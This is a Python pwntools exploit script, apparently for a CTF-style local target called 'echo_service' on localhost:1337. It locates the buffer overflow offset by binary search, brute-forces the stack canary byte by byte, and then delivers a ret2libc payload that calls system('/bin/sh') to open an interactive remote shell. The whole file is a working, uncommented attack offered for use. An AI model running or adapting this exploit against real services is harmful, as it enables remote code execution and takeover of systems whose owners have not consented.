from pwn import *
import time

context.log_level = 'error'

stack_cookie = None
#stack_cookie = p32(0xff9a9600)

host = 'localhost'
port = 1337

delay = 0.5

canary_crash_msg = "*** stack smashing detected ***: ./echo_service terminated\n"

def err(msg):
	print "[-] %s" % msg
	exit(0)

def send(data):
	r = remote(host, port)
	r.send(data)
	time.sleep(delay)
	response = r.recv(2048)
	r.close()
	return response

def has_crashed(response):
	if canary_crash_msg in response:
		return True
	return False

def find_crash_offset(min=1, max=500):
	last = -1
	while True:
		offset = int((max + min) / 2)
		if offset == last:
			return None
		if has_crashed(send('A' * offset)):
			max = offset
		else:
			if has_crashed(send('A' * (offset + 1))):
				return offset
			offset += 1
			min = offset
		last = offset

def bf_byte(data):
	for i in range(256):
		if not has_crashed(send(data + chr(i))):
			print "\t- 0x%02x" % i
			return chr(i)
	return None

def bf_canary(offset):
	canary = ""
	for i in range(4):
		tmp = bf_byte('A' * offset + canary)
		if tmp != None:
			canary += tmp
		else:
			return None
	return canary

def ret2libc(payload, system, binsh):
	r = remote(host, port)
	r.send(payload + "A" * 0xc + system + "Oik=" + binsh)
	r.recv(2048)
	r.interactive()
	r.close()

def main(libc_addr):
	print "[!] Looking for crash offset..."
	offset = find_crash_offset()
	libc = ELF('./libc.so')
	if offset != None:
		print "[+] Crash offset found : 0x%x" % offset
		canary = None
		if stack_cookie == None:
			print "[!] Trying to bruteforce the canary..."
			canary = bf_canary(offset)
		else:
			canary = stack_cookie
		if canary != None:
			print "[+] Canary found : %s" % str(hex(u32(canary)))
			print "[!] Trying to spawn a shell..."
			ret2libc('A' * offset + canary, p32(libc_addr + libc.symbols['system']), p32(libc_addr + libc.search('/bin/sh\x00').next()))
		else:
			err("Canary not found...")
	else:
		err("Crash offset not found...")

if __name__ == '__main__':
	main(int(sys.argv[1], base=16))
